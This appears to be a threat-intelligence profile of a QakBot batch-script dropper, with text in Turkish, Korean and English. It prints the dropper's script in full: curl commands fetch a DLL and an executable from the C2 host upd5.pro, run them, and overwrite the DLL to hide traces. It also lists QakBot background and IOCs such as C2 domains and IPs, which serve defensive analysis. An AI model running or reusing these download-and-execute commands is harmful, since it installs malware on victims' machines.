파일 Kimligi
| SHA256 | 3b3bd81232f517ba6d65c7838c205b301b0f27572fcfef9e5b86dd30a1d55a0d |
|---|---|
| Format | Windows Batch Script (.bat) |
| 크기 | 326 byte — minimal dropper |
Cleartext Batch Script Icerik
echo "-> Loading update 2..." curl -o 02.dll https://upd5.pro/update/02.dll rundll32.exe 02.dll,checkit echo "-> Loading update 2 tool..." curl -o qd_x86.exe https://upd5.pro/update/qd_x86.exe qd_x86.exe type c:\Windows\System32\conhost.exe > 02.dll
Analiz
| Adim | Eylem |
|---|---|
| 1 | curl ile C2'den 02.dll indir |
| 2 | rundll32.exe 02.dll,checkit — DLL export checkit ile calistir |
| 3 | curl ile qd_x86.exe indir ve calistir |
| 4 | Anti-Forensics: type conhost.exe > 02.dll — DLL'yi mesgru Windows dosyasıyla uzer! |
C2 Sunucusu
C2 Domain: upd5.pro Payload 1: https://upd5.pro/update/02.dll (Qakbot DLL, export: checkit) Payload 2: https://upd5.pro/update/qd_x86.exe (ikinci asama PE)
Qakbot Hakkinda
Qakbot (Qbot), 2007 yilinda baslayan ve 2023 FBI "Operation Duck Hunt" operasyonuyla altyapisi cokutulen bir banking botnet ailesidir. Ransomware operasyonlari icin (Conti, ProLock, Egregor) ilk erisim saglayici olarak yaygin kullanilmistir. Black Basta ve REvil ile calisma gecmisi bulunmaktadir. 2024'te yeniden aktif hale geldigi gozlemlenmistir.
IOC
| SHA256 | 3b3bd81232f517ba6d65c7838c205b301b0f27572fcfef9e5b86dd30a1d55a0d |
|---|---|
| C2 Domain | upd5.pro |
| DLL URL | https://upd5.pro/update/02.dll (checkit) |
| EXE URL | https://upd5.pro/update/qd_x86.exe |
| Anti-Forensics | conhost.exe ile DLL uzerine yazma |
QakBot — 악성코드 프로필
QakBot Quakbot banker. Notesvb.msi delivery. Named pipe IPC. Modular architecture.
기술 세부 정보
QakBot (Qbot/QuakBot) is a banking trojan and loader active since 2007. Features: credential theft, email hijacking for thread hijacking attacks, lateral movement via SMB/psexec, web injection for banking fraud. Delivered via malspam using hijacked email threads (reply-chain attacks). Modules: email collector, credential grabber, network scanner, VNC plugin. Used to deliver Egregor, ProLock, REvil, Black Basta ransomware. FBI "Operation Duck Hunt" disrupted infrastructure August 2023, removing QakBot from 700,000+ infected machines. Attempted comeback Q4 2023 with new delivery methods.
귀속 / 위협 행위자
Gold Lagoon, TA570 (Shatak)
기능 및 동작
IOC 목록 (1 개 지표)
# SHA256
3b3bd81232f517ba6d65c7838c205b301b0f27572fcfef9e5b86dd30a1d55a0d
| 유형 | 값 | 메모 |
|---|---|---|
| sha256 | 3b3bd81232f517ba6d65c7838c205b301b0f27572fcfef9e5b86dd30a1d55a0d |
C2 서버 (이 패밀리에 대해 8개의 서버 기록)
| 주소 | 유형 | 포트 | 프로토콜 | 상태 | 국가 |
|---|---|---|---|---|---|
| 95.217.35.154 | ip | 443 | HTTPS | inactive | FI |
| upd5.pro | domain | 443 | HTTPS | inactive | — |
| upd5.pro | domain | 443 | HTTPS | inactive | — |
| metasta.me | domain | 443 | HTTPS | inactive | — |
| upd5.pro | domain | 443 | HTTPS | inactive | — |
| amacey.com | domain | 443 | HTTPS | inactive | — |
| 181.174.165.208 | ip | 443 | HTTPS | sinkholed | AR |
| 212.117.180.232 | ip | 443 | HTTPS | sinkholed | CH |
C2 주소는 KEYDAL 팀이 수동으로 검증한 악성코드 샘플에서만 제공됩니다. 상업적 사용은 금지됩니다.